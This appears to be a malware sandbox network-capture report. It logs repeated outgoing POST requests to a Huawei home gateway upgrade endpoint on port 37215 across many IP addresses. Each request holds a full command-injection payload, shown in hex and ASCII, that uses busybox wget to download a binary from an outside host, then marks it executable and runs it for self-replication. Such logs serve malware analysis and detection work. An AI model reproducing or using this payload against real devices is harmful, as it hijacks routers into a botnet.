                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  256192.168.2.1346144197.89.8.8837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.668663025 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  257192.168.2.134689041.177.90.20037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.668714046 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  258192.168.2.1349768197.151.238.1937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.668740034 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  259192.168.2.1348628157.40.203.20937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.668761969 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  260192.168.2.1332930197.48.20.18937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.668824911 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  261192.168.2.1339388157.78.61.16437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.668824911 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  262192.168.2.1333968197.235.29.17337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.226617098 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  263192.168.2.1340016197.179.20.1437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.226644039 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  264192.168.2.1336044157.177.234.4937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.226670980 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  265192.168.2.136028841.143.49.5337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.226685047 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 